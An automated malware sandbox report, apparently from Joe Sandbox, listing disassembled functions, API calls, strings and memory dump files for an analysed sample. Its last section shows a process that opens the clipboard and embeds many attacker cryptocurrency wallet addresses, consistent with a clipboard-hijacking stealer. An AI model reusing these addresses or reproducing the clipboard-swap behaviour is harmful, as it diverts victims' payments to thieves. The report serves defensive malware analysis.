Instruction Fuzzy Hash: 86612373F18242B2EE20BF11E840579F761BB4DBA4F848634CA5D07398DE7DE049E224

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA1110 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

%p not found?!?!, xrefs: 00007FF738DA132E

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %p not found?!?!
API String ID: 0-11085004
Opcode ID: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction ID: 2a0769bf0b3a747c8467b453f40442cbdc5aa0ddfd66812798f7af23c1ff0e8c
Opcode Fuzzy Hash: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction Fuzzy Hash: 36513527A69706A0FE65BB55D0513B8D3A0AF4CB80FE84535CE5D4A391EF3DE448E328

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

Unknown error, xrefs: 00007FF738D9E61C
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction ID: ce11d0b94f6176bba91cbd75dce09afdbc04b0e7631093532426b3b3eaa5dd7b
Opcode Fuzzy Hash: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction Fuzzy Hash: 4B01CE62808E8992D6029F1CD8011EAB375FF9D79AFA45331EA8C26260DF3AD543DB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF738D9E600

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction ID: 379a0ed4dc23d71eb2c66205a2f7e296c7b2edda51420f3b79ba3c8b0b88d82d
Opcode Fuzzy Hash: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction Fuzzy Hash: 4AF0C253818E8892D6029F1CA4000EBF331FF4E789F681335EF8D2A161DF29D5429710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597
Total loss of significance (TLOSS), xrefs: 00007FF738D9E610

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction ID: b5ec9869341b7b51e3bfbc9c5c16c5b0a76d6001c077e2d445d6ebf51b6f4a49
Opcode Fuzzy Hash: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction Fuzzy Hash: 4FF0C253818E8492D6029F1CA4000EBF331FF4D789F681335EF8D26120DF29D5429710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF738D9E5E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction ID: 3aa30dd2b0c36f458961e5bda257bc4c6695ae139cd0b99a934a59d31943b2f4
Opcode Fuzzy Hash: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction Fuzzy Hash: 7CF0C253818E8492D6029F1CA4000EBF331FF4D789F681335EF8D26160DF29D5429710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597
Overflow range error (OVERFLOW), xrefs: 00007FF738D9E5F0

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction ID: 3d622b5d28571624565666aeeee2df03d2b3bdb4ce77cca0ade540c0eb8e5918
Opcode Fuzzy Hash: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction Fuzzy Hash: CBF06253818E8492D602AF1CA4000EBF375FF4D789F685335EF8D26564DF29D5469714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

Argument domain error (DOMAIN), xrefs: 00007FF738D9E5D0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction ID: 7dda606d986b83040fc7adb3dd70e6b1b1f0fa61641484b13cf07575db49ce49
Opcode Fuzzy Hash: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction Fuzzy Hash: A4F06253818E8492D602DF1CA4000EBF375FF4D789F685335EF8D26564DF29D5469714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9E568 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF738D9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF738D9E597
Argument singularity (SIGN), xrefs: 00007FF738D9E568

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction ID: 4078d79df3eee1e0419241d419557afed072e2281787329f1a79e40751b657e6
Opcode Fuzzy Hash: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction Fuzzy Hash: 9AF06212814E8492D6029F1CA4000ABB375FF4D789F545325EF8D26124DF29D5429710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9550 Relevance: 5.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF738DA9597
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA95C1

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction ID: 6349ca10e1792e0716c53f71f4d20b750c3337723d9f4689df86268b8090f26c
Opcode Fuzzy Hash: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction Fuzzy Hash: E531A573A18242AAE744DF35D401669A3A4FB44B6CF984132CD3A4E384DF3DD889D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9880 Relevance: 5.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF738DA9899
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA98AF

Part of subcall function 00007FF738DA8880: EnterCriticalSection.KERNEL32 ref: 00007FF738DA8898
Part of subcall function 00007FF738DA8880: ReleaseSemaphore.KERNEL32 ref: 00007FF738DA88C6
Part of subcall function 00007FF738DA8880: LeaveCriticalSection.KERNEL32 ref: 00007FF738DA88D3

LeaveCriticalSection.KERNEL32 ref: 00007FF738DA9913

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
String ID:
API String ID: 3630377130-0
Opcode ID: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction ID: 68a0d697bd8c7909d3c47949f850838becd36edcb0af0b3b650800f2a01b2afc
Opcode Fuzzy Hash: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction Fuzzy Hash: 4F319673A14602B6D754AF35D4002A9B360FB48FA8FA44131DE2E8B384DF3DE449E324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9410 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF738DA9457
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA947E

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction ID: 716ed04094146701bc9a4f23145f14af98ca069b5edef9657817f34aaf449dff
Opcode Fuzzy Hash: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction Fuzzy Hash: AB3176B3A28202AAD754DF34D405269B3A0FB48B68FA88635CD294E788DF7ED444D764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA9120 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF738DA9749), ref: 00007FF738DA9146
LeaveCriticalSection.KERNEL32(?,00007FF738DA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF739051400,?), ref: 00007FF738DA916B
EnterCriticalSection.KERNEL32(?,00007FF738DA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF739051400,?), ref: 00007FF738DA919C
LeaveCriticalSection.KERNEL32(?,00007FF738DA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF739051400,?), ref: 00007FF738DA91A6

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction ID: e7210283d62490221e02007acef4895d6454a3d250f5aff3a8cadf99b456b3e0
Opcode Fuzzy Hash: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction Fuzzy Hash: F0014723B18605B8E615EB23AC00A2AD210BF88FD9FC45030DD0E0B340CD3ED846A310

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MfU3390p.exePID: 3332, Parent PID: 2980COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	1900
Total number of Limit Nodes:	23

Executed Functions

Function 00F216C0 Relevance: 51.4, APIs: 12, Strings: 17, Instructions: 659sleepprocessclipboardCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F216F8
GetCurrentProcess.KERNEL32 ref: 00F2171F
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00F2172D
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?), ref: 00F21751
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F2180D
___tlregdtor.LIBCMT ref: 00F218AD
StrCatW.SHLWAPI(?,00000150), ref: 00F2191C
StrCatW.SHLWAPI(?,?), ref: 00F2192E
StrCatW.SHLWAPI(?,00000000), ref: 00F21999
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F21A19
OpenClipboard.USER32(00000000), ref: 00F21A22
Sleep.KERNELBASE(0000000A), ref: 00F21F3D

Strings

TSFzn2Z15Moi4CimtErcjt5PetMeqv5spX, xrefs: 00F21D42, 00F21D6D
D, xrefs: 00F219A2
ltc1, xrefs: 00F21D7C
ltc1qzhcqd8dwhttywhgcmwn8duemqu272djelpwwxr, xrefs: 00F21D8C, 00F21DB7
LTCPKXuKtmwEKxqex7y5Sgt89z3pWJ9zFZ, xrefs: 00F21C9B, 00F21CBE
DH^., xrefs: 00F21A95
P^w, xrefs: 00F21A22
Rz(C, xrefs: 00F21E65
0xB9ac646751eeaC4c3A9590890EFC8a0FFF564aba, xrefs: 00F21C23, 00F21C4D
47g94vAnkNu6zukh16J8NPj4bFxTu4EFM9iJ2zkuamnC7CgAAEZB1y8MfuELbaooyWewPSJ2xibhtZvKRYndE3QrSe7Z4Jk, xrefs: 00F21DCA, 00F21DF5
bc1q, xrefs: 00F21BA4
pGt, xrefs: 00F2190D, 00F21983
1JDnBLMbGApADkjdvF3hBx1EAxgR6e8oXB, xrefs: 00F21C67, 00F21C8A
bc1qyjnkqksy5pu9822xcuap4k95wnkq0w2kfu95nv, xrefs: 00F21BAE, 00F21BD1
DJCsr3DybFwksqdu8vpkw6iGK68zkeuX1i, xrefs: 00F21CCF, 00F21CF9
qzgxexcalkzzj4ead36uvhhaceuyaujpsswn9ncnzn, xrefs: 00F21BE2, 00F21C09
rwtNuiPtKMEBriMowNv8NKQCHV967gm9Pi, xrefs: 00F21D0A, 00F21D2D

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
